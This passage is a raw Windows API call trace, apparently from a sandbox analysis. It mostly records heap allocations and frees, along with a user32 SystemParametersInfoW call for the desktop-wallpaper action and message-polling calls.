[0242.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0242.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0242.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0242.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0242.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0242.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0242.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0242.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0242.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0242.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0242.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0242.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0242.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0242.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0242.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0242.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0242.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0242.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0242.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0242.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0242.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0242.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0242.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0242.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0242.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0242.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0242.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0242.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0242.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0242.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0242.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0242.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0242.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0242.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0242.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0242.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0242.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0242.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0242.561] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0242.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0242.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0242.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0242.561] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0242.561] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0242.561] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0242.561] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0242.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0242.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0242.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0242.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0242.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0242.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0242.561] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0242.561] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0242.561] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0242.561] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0242.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0242.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0242.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0242.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0242.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0242.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0242.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0242.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0242.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0242.562] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0242.562] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0242.562] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0242.562] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0242.562] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0242.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0242.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0242.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0242.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0242.562] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0242.562] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0242.562] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0242.562] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0242.562] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0242.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0242.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0242.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0242.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0242.562] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0242.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0242.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0242.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0242.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f6f40 [0242.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f6f40, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0242.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0242.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0242.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0242.563] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0242.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0242.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0242.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0242.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0242.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0242.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0242.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0242.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0242.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0242.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0242.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0242.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0242.564] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0242.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865268 [0242.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7060 [0242.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0242.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0242.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0242.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0242.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0242.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0242.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0242.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0242.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0242.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0242.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0242.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0242.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0242.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0242.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0242.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0242.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0242.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0242.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0242.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0242.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0242.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0242.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0242.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0242.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0242.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0242.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0242.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0242.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0242.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0242.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0242.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0242.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0242.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0242.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0242.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0242.661] FreeLibrary (hLibModule=0x76240000) returned 1 [0242.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0242.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0242.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0242.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0242.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0242.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0242.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0242.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0242.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0242.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0242.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0242.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0242.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0242.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0242.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0242.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0242.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0242.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0242.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0242.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0242.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0242.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0242.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0242.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0242.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0242.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0242.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0242.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0242.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0242.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0242.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865f58 [0242.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0242.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0242.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865268 | out: hHeap=0x2af0000) returned 1 [0242.662] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0242.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0242.662] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0242.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0242.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0242.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0242.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0242.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0242.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0242.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0242.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0242.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0242.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0242.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0242.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0242.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0242.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0242.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0242.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0242.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0242.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0242.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0242.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0242.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0242.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0242.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0242.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0242.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0242.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0242.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0242.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865f58 | out: hHeap=0x2af0000) returned 1 [0242.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0242.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0242.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0242.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0242.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0242.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0242.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0242.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0242.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0242.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0242.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0242.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0242.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0242.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0242.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0242.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0242.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0242.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0242.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0242.664] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, 